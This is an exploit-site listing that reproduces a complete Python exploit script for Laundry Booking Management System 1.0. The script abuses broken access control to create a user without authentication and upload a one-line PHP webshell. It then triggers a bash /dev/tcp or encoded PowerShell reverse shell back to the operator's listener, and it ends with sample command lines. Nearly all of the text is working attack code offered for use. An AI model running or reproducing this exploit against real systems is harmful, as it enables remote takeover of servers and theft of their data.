Exploit for Laundry Booking Management System 1.0 Remote Code Execution

Name: Exploit for Laundry Booking Management System 1.0 Remote Code Execution
Rating: 5 (278 reviews)
2021-11-30 | CVSS 0.5
## https://sploitus.com/exploit?id=PACKETSTORM:165098
# Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE)  
# Date: 29/11/2021  
# Exploit Author: Pablo Santiago  
# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip  
# Version: 1.0  
# Tested on: Windows 7 and Ubuntu 21.10  
  
# Vulnerability: Its possible create an user without being authenticated,  
# in this request you can upload a simple webshell which will used to get a  
# reverse shell  
  
import re, sys, argparse, requests, time, os  
import subprocess, pyfiglet  
  
ascii_banner = pyfiglet.figlet_format("Laundry")  
print(ascii_banner)  
print(" Booking Management System\n")  
print("----[Broken Access Control to RCE]----\n")  
  
  
class Exploit:  
  
def __init__(self,target, shell_name,localhost,localport,os):  
  
self.target=target  
self.shell_name=shell_name  
self.localhost=localhost  
self.localport=localport  
self.LHL= '/'.join([localhost,localport])  
self.HPW= "'"+localhost+"'"+','+localport  
self.os=os  
self.session = requests.Session()  
#self.http_proxy = "http://127.0.0.1:8080"  
#self.https_proxy = "https://127.0.0.1:8080"  
#self.proxies = {"http" : self.http_proxy,  
# "https" : self.https_proxy}  
  
self.headers= {'Cookie': 'PHPSESSID= Broken Access Control'}  
  
def create_user(self):  
  
url = self.target+"/pages/save_user.php"  
data = {  
"fname":"bypass",  
"email":"bypass@bypass.com",  
"password":"password",  
"group_id": "2",  
  
}  
  
#Creates user "bypass" and upload a simple webshell without  
authentication  
request = self.session.post(url,  
data=data,headers=self.headers,files={"image":(self.shell_name  
+'.php',"<?=`$_GET[cmd]`?>")})  
time.sleep(3)  
if (request.status_code == 200):  
print('[*] The user and webshell were created\n')  
else:  
print('Something was wront...!')  
  
def execute_shell(self):  
if self.os == "linux":  
time.sleep(3)  
print("[*] Starting reverse shell\n")  
subprocess.Popen(["nc","-nvlp", self.localport])  
time.sleep(3)  
  
#Use a payload in bash to get a reverse shell  
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'  
execute_command =  
self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload  
  
try:  
request_rce = requests.get(execute_command)  
print(request_rce.text)  
  
except requests.exceptions.ReadTimeout:  
pass  
  
elif self.os == "windows":  
time.sleep(3)  
print("[*] Starting reverse shell\n")  
subprocess.Popen(["nc","-nvlp", self.localport])  
time.sleep(3)  
  
#Use a payload in powershell to get a reverse shell  
payload =  
"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)  
{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""  
execute_command =  
self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload  
  
  
try:  
request_rce = requests.get(execute_command)  
print(request_rce.text)  
  
except requests.exceptions.ReadTimeout:  
pass  
  
else:  
print('Windows or linux')  
  
  
def get_args():  
parser = argparse.ArgumentParser(description='Laundry Booking  
Management System')  
parser.add_argument('-t', '--target', dest="target", required=True,  
action='store', help='Target url')  
parser.add_argument('-s', '--shell_name', dest="shell_name",  
required=True, action='store', help='shell_name')  
parser.add_argument('-l', '--localhost', dest="localhost",  
required=True, action='store', help='local host')  
parser.add_argument('-p', '--localport', dest="localport",  
required=True, action='store', help='local port')  
parser.add_argument('-os', '--os', choices=['linux', 'windows'],  
dest="os", required=True, action='store', help='linux,windows')  
args = parser.parse_args()  
return args  
  
args = get_args()  
target = args.target  
shell_name = args.shell_name  
localhost = args.localhost  
localport = args.localport  
  
  
xp = Exploit(target, shell_name,localhost,localport,args.os)  
xp.create_user()  
xp.execute_shell()  
  
#Example software vulnerable installed in windows:python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows  
#Example software vulnerable installed in linux: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux